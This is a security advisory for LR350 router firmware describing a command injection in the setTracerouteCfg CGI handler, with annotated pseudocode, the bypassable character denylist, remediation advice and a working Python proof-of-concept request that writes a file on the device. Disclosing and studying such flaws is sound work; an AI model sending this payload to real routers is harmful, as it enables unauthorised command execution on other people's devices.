Overview

Affected version

LR350 V9.3.5u.6369_B20220309

Vulnerability details

The LR350 V9.3.5u.6369_B20220309 firmware has a command injection vulnerability in the setTracerouteCfg function. The Var variable receives the command parameter from a POST request. The only filtering applied to it is Validity_check, a denylist of a few characters and substrings. Because the user controls the value of command, the string that reaches doSystem can carry attacker-supplied shell syntax, which results in command injection.

/*
 * Decompiler pseudocode of the handler for the "setTracerouteCfg" request.
 *
 * Reads the request variables "command" and "num", builds a traceroute
 * command line in a 128-byte stack buffer and passes it to doSystem().
 * a1 is the request context handed to websGetVar(); its layout is not
 * visible in this listing.
 *
 * Security-relevant points visible here:
 *  - "command" is copied into the command line with %s, filtered only by
 *    the Validity_check() denylist.
 *  - The format string itself relies on shell redirection ("&>"), so the
 *    string is presumably interpreted by a shell inside doSystem()
 *    (doSystem is not shown; confirm against the binary).
 *  - sprintf() has no length bound; nothing in this function limits the
 *    length of "command" before it is written into v6.
 *
 * Remediation direction: accept only a hostname or IP literal (allowlist),
 * bound the length, use snprintf(), and start traceroute with an argument
 * vector instead of a shell command string.
 */
int __fastcall set_setTracerouteCfg(int a1)
{
  const char *Var; // $s1
  int v3; // $v0
  int v4; // $s0
  char v6[128]; // [sp+18h] [-80h] BYREF

  memset(v6, 0, sizeof(v6));
  // Request-controlled target; "www.baidu.com" is the default passed to websGetVar.
  Var = (const char *)websGetVar(a1, "command", "www.baidu.com");
  // Request-controlled hop limit, converted with atoi(); no range check follows.
  v3 = websGetVar(a1, "num", &byte_431160);
  v4 = atoi(v3);
  // Validity_check() returns non-zero when a denylisted token is present,
  // so the command runs only when none of them was found.
  if ( !Validity_check((int)Var) )
  {
    // Unbounded write into the 128-byte v6: the length of Var is never checked here.
    sprintf(v6, "traceroute -m %d %s&>/var/log/traceRouteLog", v4, Var);
    // Sink: the assembled string, including the request-supplied part, is executed.
    doSystem(v6);
  }
  // The same response is set whether or not the command was run.
  setResponse(&word_42F724, "reserv");
  return 1;
}
/*
 * Denylist filter applied to the "command" request variable.
 *
 * Returns non-zero when the string at a1 contains any of the listed
 * characters or substrings, and zero otherwise. The numeric arguments to
 * strchr() are ASCII codes; the characters are given next to each line.
 *
 * This is a denylist, not validation of the expected format: any shell
 * syntax that is not listed passes through. The redirection character '>'
 * used in the PoC request on this page is not among the checked values.
 * A hostname/IP allowlist would reject such input by construction.
 */
BOOL __fastcall Validity_check(int a1)
{
  return strchr(a1, 59)              // ';'
      || strstr(a1, ".sh")
      || strstr(a1, "iptables")
      || strstr(a1, "telnetd")
      || strchr(a1, 38)              // '&'
      || strchr(a1, 124)             // '|'
      || strchr(a1, 96)              // '`'
      || strchr(a1, 36)              // '$'
      || strchr(a1, 10) != 0;        // '\n' (line feed)
}

POC

# Proof-of-concept request from the advisory: one POST to the device's CGI
# endpoint, with "topicurl" selecting the setTracerouteCfg handler.
#
# Detection note: the pattern to look for in web or proxy logs is a POST to
# /cgi-bin/cstecgi.cgi whose body has topicurl "setTracerouteCfg" and a
# "command" value that is not a plain hostname or IP address.
import requests
# The angle brackets around the address look like autolink markup left over
# from the page export rather than part of the original script.
url = "<http://192.168.153.2/cgi-bin/cstecgi.cgi>"
# Session value from the author's test setup; the request is sent with it,
# so the advisory presumably assumes an existing session -- confirm.
cookie = {"Cookie":"SESSION_ID=2:1768012309:2"}

# "command" contains none of the tokens rejected by Validity_check() and is
# interpolated as-is into the traceroute command line. The '>' redirection is
# then applied by whatever interprets that string, so the visible effect is
# presumably a file created or truncated at /www/123.txt.
data = {"command":"echo hacker > /www/123.txt","num":"4","topicurl":"setTracerouteCfg"}
response = requests.post(url, cookies=cookie, json=data)
# The handler sets the same response whether or not the command ran, so the
# printed reply does not by itself show whether the injection succeeded.
print(response.text)
print(response)

image.png